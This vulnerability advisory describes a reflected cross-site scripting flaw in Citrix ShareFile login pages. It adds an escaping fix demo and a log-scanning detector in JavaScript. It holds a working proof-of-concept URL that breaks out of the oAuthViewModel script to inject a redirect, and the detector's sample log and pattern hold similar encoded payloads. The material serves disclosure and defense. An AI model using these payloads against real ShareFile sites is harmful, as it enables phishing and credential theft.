A security-related issue with Citrix ShareFile login pages has been discovered. The issue is a reflected cross-site scripting vulnerability which could allow a malicious actor to steal login credentials or tokens, execute code in the context of a victim's browser, or perform a variety of other malicious actions.
Citrix has elected not to publish information regarding this issue or provide notice to customers.
This issue can be triggered by visiting any of the login pages on a ShareFile domain:
- https://<ShareFile Customer Prefix>.sharefile.com/Authentication/Login
- https://<ShareFile Customer Prefix>.sharefile.com/Authentication/StartLogin
- https://<ShareFile Customer Prefix>.sharefile.com/login
- https://<ShareFile Customer Prefix>.sharefile.com/oauth/authorize
- And potentially others.
When a request for the login page is sent, some processing appears to be done server-side to prepare responses containing client-side JavaScript. In particular, request parameters are inserted into the "oAuthViewModel" variable in an unsafe manner. For example, a standard request to the login page produces a script within the response containing the following:
-----
Requested URL: https://tenable.sharefile.com
Redirected URL: https://tenable.sharefile.com/oauth/authorize?client_id=S---REDACTED---y&scope=&response_type=code&redirect_uri=https%3A%2F%2Fauth.sharefile.io%2Fsignin-sharefile&state=C---REDACTED---&subdomain=tenable
-----
<script nonce="qKbH---REDACTED---6GLZ6A==">
oAuthViewModel = {"ApiUrl":"https://tenable.sharefile.com/sf/v3/","OAuthUrl":"https://tenable.sharefile.com/oauth/oauthapi.aspx","CachePath":"/cache/---REDACTED---/","ErrorCorrelationId":"---REDACTED---","Theme":{"Name":"onecitrix"},"PageWidth":"device-width","FixViewport":false,"ToolLinkText":"Citrix Systems, Inc. WCS Authentication","ToolLinkNavigateUrl":"http://https://www.sharefile.com","ClientInfoVisible":false,"WebflowSettings":{"ClientId":"S---REDACTED---y","State":"C---REDACTED---_","RedirectUri":"https://auth.sharefile.io/signin-sharefile","SamlNoIframe":false,"ResponseType":"code","Hash":"","Username":"","Email":null,"SubDomain":"tenable","RequireV3":false,"Animations":false,"BaseUrl":"tenable.sharefile.com","CompanyName":"ShareFile","Capabilities":[""],"ResetId":"","Action":null,"AutoRedirect":false,"SSOInfo":{"Info":[],"AppControlPlane":"sharefile.com","ApiControlPlane":"sf-api.com","IsComponentSpaceEnabled":false,"odata.metadata":"https://tenable.sf-api.com/sf/v3/$metadata#SSOInfo/ShareFile.Api.Models.SSOInfo@Element","odata.type":"ShareFile.Api.Models.SSOInfo","Id":null,"url":"https://tenable.sf-api.com/sf/v3/SSOInfo"},"AppCode":"SFIdentity","LogoUrl":null,"LogoBackgroundColor":null,"BackdropColor":null,"LoginPageText":null,"HeaderBackgroundUrl":null,"HeaderBackgroundColor":null,"LoginPageBackgroundColor":null,"LoginPageBackgroundImageUrl":null,"LoginPageSSOSignInTitle":null,"LoginPageShareFileSignInTitle":null,"FavIconUrl":null,"DeviceIdSupported":false,"DeviceId":null},"IsWebAppClient":true,"Title":"ShareFile Login","MarketingSiteMetaTagDescription":null,"IsSecureSubdomain":false,"IsProductionAppDomain":true,"ActivationToken":"","PromptLoginAfterActivation":false,"UserTokenType":null,"UserToken":null,"UserHint":"","LoginPageType":0,"WebpopLoginPageType":0,"NoJavascriptUrl":"/oauth/oauthwebflow_invalid.aspx?error=NoJavaScript","ErrorMessage":null, ...};
</script>
-----
In the above, the parameters included in the redirected request URL are inserted into the snippet of JavaScript. These parameters can be manipulated in order to insert unsafe elements into the page, which can lead to cross-site scripting, HTML injection, redirection, etc. In order to exploit this issue, a tag that prematurely closes the "<script>" element containing "oAuthViewModel" needs to be included, which then allows for further injection into the page body.
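The following is an added example, not code from the advisory or from Citrix/ShareFile, showing why JSON-encoding a request parameter into an inline script is not enough on its own, and the escaping that closes the hole. The function names (renderUnsafe, renderSafe, escapeJsonForScript, scriptClosedEarly) and the trimmed view-model shape are assumptions made for illustration; the constructed value mirrors the closing-tag shape described above.

```javascript
// Added example (not from the advisory or from Citrix/ShareFile code): how a
// server-side template that embeds request parameters into an inline
// <script> variable becomes injectable, and the escaping that prevents it.
// Function names and the view-model fields are assumptions for illustration.

// Naive embedding: JSON.stringify alone does not escape '<' or '>', so a value
// containing "</script>" terminates the script element in the browser's HTML
// parser before the JavaScript engine ever parses the JSON string.
function renderUnsafe(viewModel) {
  return '<script>\noAuthViewModel = ' + JSON.stringify(viewModel) + ';\n</script>';
}

// Hardened embedding: rewrite characters that matter to the HTML parser
// (and the two line terminators JSON allows raw, which break older JS parsers)
// as JSON \uXXXX escapes. The text is still valid JSON/JS and decodes to the
// same string, but the HTML tokenizer never sees a literal "</script>".
function escapeJsonForScript(json) {
  return json.replace(/[<>&\u2028\u2029]/g, (ch) =>
    '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

function renderSafe(viewModel) {
  return '<script>\noAuthViewModel = ' +
    escapeJsonForScript(JSON.stringify(viewModel)) + ';\n</script>';
}

// Approximates the HTML tokenizer: a script element ends at the first
// "</script" (case-insensitive) after the opening tag, regardless of
// JavaScript string boundaries. Returns true if the embedded value ended the
// element before the template's own closing tag.
function scriptClosedEarly(html) {
  const open = html.indexOf('<script>') + '<script>'.length;
  const firstClose = html.toLowerCase().indexOf('</script', open);
  const intendedClose = html.lastIndexOf('</script>');
  return firstClose !== intendedClose;
}

// Constructed sample: a reflected parameter carrying a closing tag followed by
// a redirecting meta element (same shape as the advisory's description).
const constructedViewModel = {
  WebflowSettings: {
    SubDomain: 'tenable',
    State: '</script><meta http-equiv=refresh content="0; URL=https://example.invalid">',
  },
};

// Round-trip check: the escaped JSON still parses back to the original object,
// so the fix changes the encoding only, not the data the page receives.
function roundTrips(viewModel) {
  const json = escapeJsonForScript(JSON.stringify(viewModel));
  return JSON.stringify(JSON.parse(json)) === JSON.stringify(viewModel);
}

console.log('unsafe closes early:', scriptClosedEarly(renderUnsafe(constructedViewModel)));
console.log('safe closes early:  ', scriptClosedEarly(renderSafe(constructedViewModel)));
```

The same idea applies to any framework's "serialize this object into a script block" helper: escaping must target the HTML context the JSON lands in, not just the JSON grammar, and a content security policy with nonces (as seen in the response above) does not help once the nonced script element itself is closed early and attacker-controlled markup follows it.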
As a proof of concept, if a user were somehow tricked into visiting the following URL, they would be redirected to "https://tenable.com". An attacker could replace this redirection with a mock login page for ShareFile or some other seemingly innocuous service. The proof of concept below uses the "a" parameter as the injection point, though it appears that all potential request variables, as well as the other values inserted into oAuthViewModel, are affected.
Proof of concept:
-----
https://tenable.sharefile.com/login?cmd=route&id=/&a=</script><meta http-equiv=refresh content='0; URL=https://tenable.com' />
-----
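As an added example for defenders (not part of the advisory), the following scans web-server access logs for requests to the login paths listed above whose query string, after percent-decoding, contains a script-closing tag. The log format, sample lines, client addresses and function names are constructed for this example; only the paths come from the advisory.

```javascript
// Added example (not part of the advisory): flag requests to the ShareFile
// login paths whose query string carries a script-closing tag, the shape an
// attempt to break out of the oAuthViewModel script block would take.
// Log format, sample lines and function names are constructed; paths are the
// ones listed in the advisory.
const LOGIN_PATHS = ['/Authentication/Login', '/Authentication/StartLogin', '/login', '/oauth/authorize'];

// Percent-decode repeatedly (bounded) so double-encoded payloads are
// normalised before matching; a malformed sequence stops decoding.
function fullyDecode(s, maxRounds = 3) {
  let prev = s;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(prev.replace(/\+/g, ' ')); } catch { return prev; }
    if (next === prev) return next;
    prev = next;
  }
  return prev;
}

// Returns a finding for a request, or null when it is not of interest.
function inspectRequest(method, url) {
  const q = url.indexOf('?');
  const path = q === -1 ? url : url.slice(0, q);
  const query = q === -1 ? '' : url.slice(q + 1);
  const isLogin = LOGIN_PATHS.some((p) => path.toLowerCase() === p.toLowerCase());
  if (!isLogin || !query) return null;
  const decoded = fullyDecode(query);
  // "</script" with optional whitespace, case-insensitive, is the trigger.
  if (!/<\s*\/\s*script/i.test(decoded)) return null;
  return { method, path, decodedQuery: decoded, reason: 'script-closing tag in login query string' };
}

// Parses a common-log-format style line (constructed) into its fields.
const LOG_RE = /^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) \S+" (\d{3}) /;
function scanLog(lines) {
  const findings = [];
  for (const line of lines) {
    const m = LOG_RE.exec(line);
    if (!m) continue;
    const f = inspectRequest(m[2], m[3]);
    if (f) findings.push({ client: m[1], status: Number(m[4]), ...f });
  }
  return findings;
}

// Constructed sample log: one plainly encoded attempt, one benign login,
// one double-encoded attempt, and one hit on a non-login path to be ignored.
const SAMPLE_LOG = [
  '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /login?cmd=route&id=/&a=%3C/script%3E%3Cmeta%20http-equiv=refresh%20content=%270;%20URL=https://example.invalid%27%3E HTTP/1.1" 200 5123',
  '198.51.100.4 - - [10/Oct/2023:13:56:01 +0000] "GET /login?cmd=route&id=/ HTTP/1.1" 200 5011',
  '198.51.100.9 - - [10/Oct/2023:13:56:14 +0000] "GET /oauth/authorize?client_id=abc&a=%253C%252Fscript%253E HTTP/1.1" 200 4998',
  '192.0.2.5 - - [10/Oct/2023:13:57:00 +0000] "GET /sf/v3/Items?a=%3C/script%3E HTTP/1.1" 200 812',
];

for (const f of scanLog(SAMPLE_LOG)) {
  console.log(`${f.client} ${f.method} ${f.path}: ${f.reason}`);
}
```

A 200 status on a flagged request is the important signal: the advisory notes that the reflected value reaches the page body, so a successful response means the payload was served rather than rejected. In practice the path list should be broadened, since the advisory states that other login pages may also be affected.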